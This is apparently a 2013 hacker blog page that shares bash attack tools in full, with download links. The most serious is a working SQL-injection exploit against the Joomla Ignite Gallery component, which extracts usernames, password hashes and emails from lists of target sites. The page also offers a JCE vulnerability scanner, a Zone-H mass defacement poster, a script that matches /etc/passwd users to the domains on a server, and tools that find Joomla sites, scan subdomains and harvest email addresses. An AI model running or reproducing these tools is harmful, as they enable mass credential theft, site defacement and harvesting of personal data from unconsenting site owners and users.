     GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
      if [ $check -eq 0 ]
         then
     echo -e "$B[+] www.$domain/ \e[1;32m[OK] \e[0m"
         echo "$domain/" >> jce_server.lst
       else
         echo "[-] www.$domain/ [No] "
      fi    
   done  
rm -rf alldomain_bing.txt 
}

#-------------------- Remove  ------------------------------------------------------------------------
all_remove()
{
 rm -rf alldomain_bing*
 rm -rf domains_f*
 rm -rf domains_f*
 rm -f domain_bing*  
 rm -rf alldomain_bing*
 rm -rf domains*
 rm -rf jce_server*
}

#-------------------- Main Brain :D  ------------------------------------------------------------------------
main()
{
Banner;
all_remove;
scan_jce_on_victim;
}

main;
Download : http://www.mediafire.com/view/g9955347r9ht6y7/jce-scanner.sh
Posted by at No comments:

Tuesday, August 20, 2013

Joomla (com_ignitegallery) Remote Exploit

D3m00 : http://www.mediafire.com/download/dxeob7as8bgozwo/Joomla-com_ignitegallery-remoot-exploit.mp4 
#!/bin/bash
#Joomla (com_ignitegallery) Remote Exploit
#Dork: inurl:"option=com_ignitegallery"
#Coded By Red V!per
# D3m00 : http://www.mediafire.com/download/dxeob7as8bgozwo/Joomla-com_ignitegallery-remoot-exploit.mp4
#Tnx 2 : All Turkish && Persian Hackers

B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"


if [[ $# != 1  ]]; then
  clear
  echo
  echo -e "$B  Joomla (com_ignitegallery) Remote Exploit - 240\n"
  echo -e " -=============================================-\n"
  echo -e "  Joomla Ignite Gallery 0.8.3.1 SQL Injection \n"
  echo  
  echo -e "  By Red Hat V!per\n"   
  echo -e " -=============================================-\n"  
  echo -e "   example: ./JCI-RE.sh targets.lst \n"
  echo -e "\n Run:$B ./JCI-RE.sh  $N\n"
  exit 1
fi

VICTIMS=$1    

clear
echo
echo -e "$B Joomla (com_ignitegallery) Remote Exploit [public] - 240\n"
echo -e " -===============================================-\n"
echo -e "   Joomla Ignite Gallery 0.8.3.1 SQL Injection "
echo  
echo -e "   BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [         INFO         ] ===========-"
echo
echo -e "  [+] Checking :$B $VICTIMS"
echo


Exploit="%20union%20select%201,2,concat%28username,0x3a,password,0x3a,email,0x3a,activati​on%29,4,5,6,7,8,9,10%20from%20jos_users--&Itemid=18&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9
088e8"

pars_respone()
{

keyword=`cat page.php | grep "[a-zA-Z0-9]:[0-9]"`
username=`echo "$keyword" | grep "
" | cut -d ':' -f 1 |sed -e 's/^[ \t]*//' | awk '{gsub("
","")}1'`
pass_1=`echo "$keyword" | grep "
" | cut -d ':' -f 2`
pass_2=`echo "$keyword" | grep "
" | cut -d ':' -f 3`
password="$pass_1:$pass_2"
email=`echo "$keyword" | grep "
" | cut -d ':' -f 4`

 echo -e "[~] $B Host     : $url_1=$url_2";
 echo -e "[~] $B Username : $username";
 echo -e "[~] $B Password : $password";
 echo -e "[~] $B Email    : $email"; 
 echo -e ""

}

pars_url()
{
 rm -rf page.php*
 url_1=`echo "$1" | cut -d '=' -f 1,2,3`
 url_2=`echo "$1" | cut -d '=' -f 4`

 url=""$url_1"=-"$url_2""$Exploit""

 wget -q -O page.php "$url" 
 pars_respone;
}

for trg in `cat $VICTIMS`
do
 pars_url $trg
done
Download Script : http://www.mediafire.com/view/c2kwa9cpm1m030d/joomla-remote-exploit.sh
Posted by at 1 comment:

Thursday, August 15, 2013

Red V!per Joomla Version Checker

 
  
#!/bin/bash
# Red V!per Joomla Version Checker 
# Coded By Red H4t V!per
# Tnx 2 : Pawel Frankowski

url="$1"

Usage()
{
  echo ""
  echo "# ***************************************************************************​****​*********************#"
  echo "# Usage      : Red V!per Joomla Version Checker <target>                                             *#"
  echo "# Help       : -h && --help : Show This Menu                                                         *#"
  echo "# RunScript  : Give Permision to script and run it !!                                                *#"
  echo "# Example    : ./script.sh www.example.com/joomla/                                                   *#"
  echo "# ***************************************************************************​****​*********************#"
  echo ""
  exit
}

Check_Arguments()
{
  if [ -z "$url" ] || [ "$url" == "-h" ] || [ "$url" == "--help" ]; then
  Usage;
  exit
  fi
}

Check_Joomla_Version()
{
clear
i=0
echo -e '\E[32m'"[*] Start Check ..."; tput sgr0
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0

wget -q "$url/templates/system/css/system.css" 

Version=`cat system.css | grep "OpenID icon style"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

version=`cat system.css | grep "2011-01-09 02:40:25Z ian"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

version=`cat system.css | grep "2011-05-11 01:10:29Z dextercowley"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.7 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

version=`cat system.css | grep "2012 Open Source Matters"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

wget -q "$url/media/system/js/mootools-more.js" 

Version=`cat mootools-more.js | grep "MooTools={version:"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat mootools-more.js | grep "1.3.0.1"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat mootools-more.js | grep "1.3.2.1"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.7 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat mootools-more.js | grep "1.4.0.1"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5.6 or 3.0 alpha 2 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

wget -q "$url/language/en-GB/en-GB.ini" 

Version=`cat en-GB.ini | grep "11391 2009-01-04 13:35:50Z ian"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.5.26 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat en-GB.ini | grep "20196 2011-01-09 02:40:25Z ian"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6.0 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat en-GB.ini | grep "2011-03-18 16:42:30Z infograf768"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6.5 or 1.7.1 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat en-GB.ini | grep "22183 2011-09-30 09:04:32Z infograf768"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.7.3 or 1.7.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat en-GB.ini | grep "<version>2.5.0"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5.0 -> 2.5.4 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi

Version=`cat en-GB.ini | grep "<version>2.5.5"`
if [ -z "$Version" ]; then
echo -e '\E[32m'"[*] Shit :( Not Found ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5.5 or 2.5.6 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
}

pre_remove()
{
 rm -rf system.css*
 rm -rf mootools-more.js*
 rm -rf en-GB.ini*
}

main()
{
pre_remove;
Check_Arguments;
Check_Joomla_Version;
}

main;   

Download :http://www.mediafire.com/download/qcu94wd73p72z78/RedViper-Joomla-Version-Chcker.sh
Posted by at No comments:

Tuesday, July 23, 2013

TBH Zone-H Mass Poster 




#!/bin/bash 
# TBH Zone-H Mass Poster 
#c0ded by Red V!per


notifier=$1
sites=$2
url="http://www.zone-h.org/notify/single"


banner()
{
echo            "                             "
echo -e '\E[32m'"_________ ______             "; tput sgr0
echo -e '\E[32m'"\__   __/(  ___ \ |\     /|  "; tput sgr0
echo -e '\E[32m'"   ) (   | (   ) )| )   ( |  "; tput sgr0
echo -e '\E[32m'"   | |   | (__/ / | (___) |  "; tput sgr0 
echo -e '\E[32m'"   | |   |  __ (  |  ___  |  "; tput sgr0
echo -e '\E[32m'"   | |   | (  \ \ | (   ) |  "; tput sgr0
echo -e '\E[32m'"   | |   | )___) )| )   ( |  "; tput sgr0
echo -e '\E[32m'"   )_(   |/ \___/ |/     \|  "; tput sgr0 
echo            "                             "
                             
}


Usage()
{
  echo ""
  echo "# ***************************************************************************​****​*********************#"
  echo "# Usage      : TBH Zone-H Mass Poster  <defacer> <sites.lst>                                         *#"
  echo "# Help       : -h && --help : Show This Menu                                                         *#"
  echo "# RunScript  : Give Permision to script and run it !!                                                *#"
  echo "# Example    : ./script.sh www.example.com  ye_bande_khoda sites.lst                                 *#"
  echo "# ***************************************************************************​****​*********************#"
  echo ""
  exit
}


Check_Arguments()
{
  if [ -z "$notifier" ] || [ "$notifier" == "-h" ] || [ "$notifier" == "--help" ]; then
  Usage;
  exit
  fi
}

Mass_Post()
{
for targets in `cat $sites`
do
       curl --user-agent "Mozilla/5.0" --silent --data "defacer=$notifier&domain1=$targets&hackmode=1&reason=1" ${url} &
       sleep 2
done
}

Main()
{
banner;
Check_Arguments;
Mass_Post;
}

Main;

Dowloadn : http://www.mediafire.com/download/j10du919tq25f2d/TBH+Zone-H+Mass+Poster.zip
Posted by at No comments:

Saturday, July 20, 2013

Web Exploiter Toolkit



This script makes it easy tasks such as client hacking , web hacking , Wireless hacking ...

Now Working on it ...

https://github.com/RedH4tViper/webexploiter
Posted by at No comments:

Red V!per User Domain Extractor


create etc-passwd.txt file Besides User+Domain Extractor script and insert Contents of
/etc/passwd file Within etc-passwd.txt then Give Permision to script and run it


#!/bin/bash
#
# ---------------------------------
# User+Domain Extractor  
# Licence : Linux
# ---------------------------------
#
# Title   : User+Domain Extractor 
# Code    : Bash 
# Author  : RedH4t.Viper
# Email   : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com
# Date    : 2013 06 May
# Home    : IrIsT Security Center
# Thanks  : IrIsT ,TBH ,kurdhackteam , 3xp1r3
#
# Gr33tz  : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Net.W0lf | 
# Gr33tz  : Skote_Vahshat| Dj.TiniVini| Mr.XHat | Black King |
# Gr33tz  : E2MAEN | Mr.F@RDIN | M4st3r4N0nY | ICA_r00t | m3hdi |
# Gr33tz  : x3o-1337 | rEd X | No PM  | Gabby | Sukhoi Su-37
# Gr33tz  : ARTA | H-SK33PY | (^_^) | Turk Sever | And All Of IrIsT Memebrz
#------------------------------------------------------------------------------------------#


IP=
F_ARG=$1
page=0
last_page_check=
how_many=1
single_page=


Usage()
{
 echo ""
 echo "# ****************************************************************************************************#"
 echo "# Usage      : User+Domain Extractor <ip>                                                            *#"
 echo "# Help       : -h &amp;&amp; --help : Show This Menu                                                         *#"
 echo "# RunScript  : create etc-passwd.txt file Besides User+Domain Extractor script and insert Contents   *#" 
 echo "# RunScript  : of /etc/passwd file Within etc-passwd.txt then Give Permision to script and run it !! *#"
 echo "# ****************************************************************************************************#"
 echo ""
}

get_reverse()
{

# check IP
  if [ `echo "$F_ARG" | egrep  "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"`  ]; then
   IP="$F_ARG"
   else
    IP=`resolveip -s "$F_ARG"`
     if [ "$?" != 0 ]; then
       echo -e "               [-] Error: cannot resolve $F_ARG to an IP " 
       exit
     fi
   fi

 url_neighbors="http://www.my-ip-neighbors.com/?domain=$IP"

 wget -q -O  my-ip-neighbors.php "$url_neighbors"

 cat my-ip-neighbors.php | egrep -o '<a -d="" -f4="" cut="" href="http://whois.domaintools.com/%5B%5E" sort="" uniq="">&gt; whois_neighbors.txt


 url_kenh12="http://ip.kenh12.com/Reverse-IP-Lookup-DNS-Domain/$IP.html"
 wget -q -O  my-ip-kenh12.php "$url_kenh12"

 cat my-ip-kenh12.php | egrep -o "gif' alt=[^&gt;]+" | cut -d '=' -f2 | sed '/www./s///g' | sort | uniq &gt;&gt; whois_kenh12.txt


while [ -z "$last_page_check" ] &amp;&amp; [ -n "$how_many" ] &amp;&amp; [ -z "$single_page" ]; do


 url="http://www.bing.com/search?q=ip%3A$IP&amp;go=&amp;qs=n&amp;first=${page}0&amp;FORM=PERE"

 wget -q -O bing.php "$url"

 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' bing.php`

 # if no results are found, how_many is empty and the loop will exit
 how_many=`egrep -o '<span class="sb_count" id="count">[^&lt;]+' bing.php |cut -d '&gt;' -f 2|cut -d ' ' -f 1-3`

 # check for a single page of results
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' bing.php`


 cat "bing.php"| egrep -o "</span></span></span></a>

<h3>
<span class="sb_count" id="count"><span class="sb_count" id="count"><span class="sb_count" id="count"><a -d="" -f="" 2="" bing.php="" cut="" href="http://www.blogger.com/%5C">&gt; alldomain_bing.txt
let page=$page+1
 rm -f bing.php
done

cat alldomain_bing.txt | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq &gt;&gt; whois_bing.txt
rm alldomain_bing.txt ;


   for line_bing in `cat whois_bing.txt`
     do
       echo "$line_bing" &gt;&gt; reversed.txt
     done 

   for line_neighbors in `cat whois_neighbors.txt`
    do
       echo "$line_neighbors" &gt;&gt; reversed.txt
    done 
  
   for line_kenh12 in `cat whois_kenh12.txt`
    do
       echo "$line_kenh12" &gt;&gt; reversed.txt
    done 

    rm whois_bing.txt;
    rm whois_neighbors.txt;
    rm whois_kenh12.txt;
    rm my-ip-neighbors.php;
    rm my-ip-kenh12.php;

}

get_user()
{
cat etc-passwd.txt | egrep  "/home" | cut -d ':' -f 1 &gt;&gt;user.txt
}

get_user_with_site()
{
for reverse in `cat user.txt`
do 
site=`cat reversed.txt | grep "$reverse"`
cat reversed.txt | grep "$reverse" &gt;&gt; /dev/null;check=$?
           if [ $check -eq 0 ]
                then
                echo -e "[+] Found : User: "$reverse" \t Site: $site" 
                echo -e "[+] Found : User: "$reverse" \t Site: $site" &gt;&gt;ListUserDomain.txt
           fi
done
rm -rf user.txt
rm -rf reversed.txt 
}

main()
{
# check for arguments 
if [ -z "$F_ARG" ] || [ "$F_ARG" == "-h" ] || [ "$F_ARG" == "--help" ]; then
Usage;
exit 
fi

get_reverse;
get_user;
get_user_with_site;
}

main;

Download: http://www.mediafire.com/download/ismd5f47n7hs7my/User_Domain_Extractor.sh 
Posted by at No comments:

Red V!per Sub Domain Scanner 



#!/bin/bash
# WebExploiter Sub Domain Scanner
# Coded By : Red H4t V!per

page=0
how_many=1
URL=$1
domain= 
single_page=
last_page_check=

banner()
{
echo "           _         _                       _                                              "
echo "          | |       | |                     (_)                                             "
echo " ___ _   _| |__   __| | ___  _ __ ___   __ _ _ _ __    ___  ___ __ _ _ __  _ __   ___ _ __  "
echo "/ __| | | | '_ \ / _\ |/ _ \| '_ \ _ \ / _\ | | '_ \  / __|/ __/ _\ | '_ \| '_ \ / _ \ '__| " 
echo "\__ \ |_| | |_) | (_| | (_) | | | | | | (_| | | | | | \__ \ (_| (_| | | | | | | |  __/ |    "
echo "|___/\__,_|_.__/ \__,_|\___/|_| |_| |_|\__,_|_|_| |_| |___/\___\__,_|_| |_|_| |_|\___|_|    "
echo "                                                                                            "

}
Usage()
{
echo ""
echo "# ***************************************************************************​****​*********************#"
echo "# Usage      : WebExploiter Sub Domain Scanner <domin>                                               *#"
echo "# Help       : -h && --help : Show This Menu                                                         *#"
echo "# RunScript  : Give Permision to script and run it !!                                                *#"
echo "# ***************************************************************************​****​*********************#"
echo ""
}

Check_Arguments()
{
if [ -z "$URL" ] || [ "$URL" == "-h" ] || [ "$URL" == "--help" ]; then
Usage;
exit
fi
}

Sub_Domain()
{

rm -f alldomain_bing.txt;
rm -f sub.txt;
rm -f sub2.txt;


if [ `echo "$URL" | egrep  "http://"` ] || [ `echo "$URL" | egrep  "Http://"` ]; 
then
echo -e "\e[1;31m[-] please insert domain with out http:// \e[0m" 
 exit 1
fi

if [ `echo "$URL" | egrep  "www."`  ]; 
then
domain=`echo "$URL" |sed '/www./s///g' `
else 
domain=$URL
fi


echo -e "\e[1;31m[*] SubDomain Urls Will be Saved  at subdomain.txt Searching Plz W8...\e[0m" 


while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do


url="http://www.bing.com/search?q=%27$domain%27&qs=n&pq=%27$domain%27&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"

wget -q -O sub_domain_bing.php "$url"

 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' sub_domain_bing.php`

 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' sub_domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' sub_domain_bing.php `


 cat "sub_domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" sub_domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
 rm -f sub_domain_bing.php
 let page=$page+1 
 done

cat alldomain_bing.txt | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq >> sub.txt

for var in `cat sub.txt` 
do 
echo "$var" | grep "$domain" >> /dev/null;check=$? 
if [ $check -eq 0 ] 
then 
 echo "$var" >> sub2.txt
fi 
done

cat sub2.txt | sort | uniq > subdomain.txt


found_N=`wc -l subdomain.txt | sed 's/subdomain.txt//'` 
echo -e "\e[1;34m[+] Found $found_N SubDomain :) \e[0m" 


for catvar in `cat subdomain.txt`
do
echo -e "\e[1;32m[*] $catvar \e[0m"   
done 

rm -f alldomain_bing.txt;
rm -f sub.txt;
rm -f sub2.txt;
}

main ()
{
banner;
Check_Arguments;
Sub_Domain;
}

main ;
Download : http://www.mediafire.com/download/638lw6ao7zjw7c4/red-viper-sub-dmoain-scannner.sh
Posted by at 1 comment:

Red V!per Server joomla Finder

  

#!/bin/bash
#
# ---------------------------------
# Server joomla Finder  
# Licence : Linux
# ---------------------------------
#
# Title    : Server Joomla Finder 
# Code     : Bash
# Author   : RedH4t.Viper
# Email    : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com
# Released : 2013 04 June
# Thanks   : IrIsT ,TBH ,kurdhackteam , 3xp1r3 , thecrowscrew
#
# Gr33tz   : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Skote_Vahshat | 
# Gr33tz   : Net.W0lf | Dj.TiniVini| Mr.XHat | Black King | Devil | 
# Gr33tz   : E2MAEN | (^_^) | M4st3r4N0nY |Turk Sever | dr.koderz | V30sharp
# Gr33tz   : ARTA | Mr.Zer0 | Sajjad13and11 | Silent | Smartprogrammer |  
# Gr33tz   : x3o-1337 | rEd X | No PM | Gabby | Sukhoi Su-37 | IR Anonymous |
# Gr33tz   : Megatron | Zer0 | sole sad | Medrik | F@rid | And All Of IrIsT Memebrz |
#------------------------------------------------------------------------------------------#

page=0
how_many=1
IP_SERVER=$1
single_page=
last_page_check=

banner()
{
echo "     _                       _          __ _           _              "
echo "    (_)                     | |        / _(_)         | |             "
echo "     _  ___   ___  _ __ ___ | | __ _  | |_ _ _ __   __| | ___ _ __    "
echo "    | |/ _ \ / _ \| '_ \ _ \| |/ _\ | |  _| | \_ \ / _\ |/ _ \  __|   " 
echo "    | | (_) | (_) | | | | | | | (_| | | | | | | | | (_| |  __/ |      "
echo "    | |\___/ \___/|_| |_| |_|_|\__,_| |_| |_|_| |_|\__,_|\___|_|      "
echo "   _/ |                                                               "
echo "  |__/                                                                "   
echo "                                                                      "
}

Usage()
{
echo ""
echo "# ***************************************************************************??****?*********************#"
echo "# Usage      : Server Joomla Finder  <IP/Domain>                                                     *#"
echo "# Help       : -h && --help : Show This Menu                                                         *#"
echo "# RunScript  : Give Permision to script and run it !!                                                *#"
echo "# ***************************************************************************??****?*********************#"
echo ""
}

Check_Arguments()
{
if [ -z "$IP_SERVER" ] || [ "$IP_SERVER" == "-h" ] || [ "$IP_SERVER" == "--help" ]; then
Usage;
exit
fi
}

Searching_Jce()
{
 rm -rf domains.txt
 rm -rf alldomain_bing.txt
 rm -rf IndexDomain.txt

  if [ `echo "$IP_SERVER" | egrep  "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"`  ]; then
    IP="$IP_SERVER"
   else
     IP=`resolveip -s "$IP_SERVER"`
      if [ "$?" != 0 ]; then
       echo -e "[-] Error: cannot resolve $IP_SERVER to an IP " 
        Check_Back
      fi
    fi

echo -e "\e[1;35m[*] Finded Joomla Web Sites Will be Save at finded.txt \e[0m"
echo -e "\e[1;35m[*] Searching Joomla Web Sites on $IP Plz W8 \e[0m"


touch  alldomain_bing.txt;

 while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

 url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"


 wget -q -O domain_bing.php "$url"


 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

# if no results are found, how_many is empty and the loop will exit
 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

#  check for a single page of results
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `


 cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
 rm -f domain_bing.php
 let page=$page+1 
 done


 cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt


  for domain in `cat domains.txt`
   do
    echo "$domain" | grep "com_" >> /dev/null;check=$?
               if [ $check -eq 0 ]
                    then
                   echo "$domain" >>IndexDomain.txt
               fi
    done

cat IndexDomain.txt | cut -d '?' -f 1 | awk '{gsub("index.php","")}1' | sort | uniq >> finded.txt

found_N=`wc -l finded.txt | sed 's/finded.txt//'` 
echo -e "\e[1;34m[+] Found $found_N :) \e[0m" 


for joom in `cat finded.txt`
do
echo -e "\e[1;32m[*] $joom \e[0m"   
done 

rm -rf domains.txt
rm -rf alldomain_bing.txt
rm -rf IndexDomain.txt
}

main()
{
banner ;
Check_Arguments;
Searching_Jce;
}

main;   

Download : http://www.mediafire.com/download/mtpy84d7lp0byol/red-viper-joomla-finder.sh
Posted by at No comments:

Red V!per Email Collector Bash Script 

#!/bin/bash
#
# ---------------------------------
# TBH && IrIsT EMail Collector  
# Licence : Linux
# ---------------------------------
#
# Title   : TBH && IrIsT EMail Collector 
# Code    : Bash 
# Author  : RedH4t.Viper
# Email   : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com
# Date    : 2013 09 May
# Thanks  : IrIsT ,TBH ,kurdhackteam , 3xp1r3
#
# Gr33tz  : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Net.W0lf | 
# Gr33tz  : Skote_Vahshat| Dj.TiniVini| Mr.XHat | Black King |
# Gr33tz  : E2MAEN | Mr.F@RDIN | M4st3r4N0nY | ICA_r00t | m3hdi |
# Gr33tz  : x3o-1337 | rEd X | No PM  | Gabby | Sukhoi Su-37
# Gr33tz  : ARTA | H-SK33PY | (^_^) | Turk Sever | And All Of IrIsT Memebrz
#------------------------------------------------------------------------------------------#
page=0
last_page_check=
how_many=1
single_page=
Domain=$1

Usage()
{
 echo ""
 echo "# ****************************************************************************************************#"
 echo "# Usage      : TBH EMail Collector <domain>                                                          *#"
 echo "# Help       : -h && --help : Show This Menu                                                         *#"
 echo "# RunScript  : Give Permision to script and run it !!                                                *#"
 echo "# ****************************************************************************************************#"
 echo ""
}

# check for arguments 
if [ -z "$Domain" ] || [ "$Domain" == "-h" ] || [ "$Domain" == "--help" ]; then
Usage;
exit 
fi

 while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

 url="http://www.bing.com/search?q=%27%40$Domain%27&qs=n&pq=%27%40$Domain%27&sc=0-0&sp=-1&sk=&first=${page}1&FORM=PERE7"

 wget -q -O page.php "$url"


 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' page.php`

# if no results are found, how_many is empty and the loop will exit
 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' page.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

#  check for a single page of results
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' page.php`

 cat page.php | egrep -o "[-A-Za-z0-9_.]+<strong>@$Domain</strong>" | tr '[:upper:]' '[:lower:]' | sort | uniq>>mails.lst 

 rm -f page.php 
 let page=$page+1 
 done

cat mails.lst | cut -d '<' -f 1 | tr '[:upper:]' '[:lower:]' | sort | uniq >> nmail.lst

found_N=`wc -l nmail.lst | sed 's/nmail.lst//'` 
echo -e "\e[1;34m [+] $found_N Email Collocted :) \e[0m" 

for ec in `cat nmail.lst`
do
echo "[*] $ec@$Domain" >> Collected.lst   
done 


for ec in `cat nmail.lst`
do
echo -e "\e[1;32m[*] $ec@$Domain \e[0m"   
done 

rm -rf mails.lst
rm -rf nmail.lst  


Download : http://www.mediafire.com/view/9962o54dqx820ow/redviper-email-collector.sh
Posted by at No comments:

Friday, July 19, 2013

How to Attack on Remote PC With Applications Vulnerabilities





Back Track Tutorials 

Article Name : How to Attack on Remote PC With Applications Vulnerabilities
language : English
Page # : 56
Download : www.mediafire.com/?809b6bu3txi2v1a
Posted by at No comments:
Subscribe to: Posts (Atom)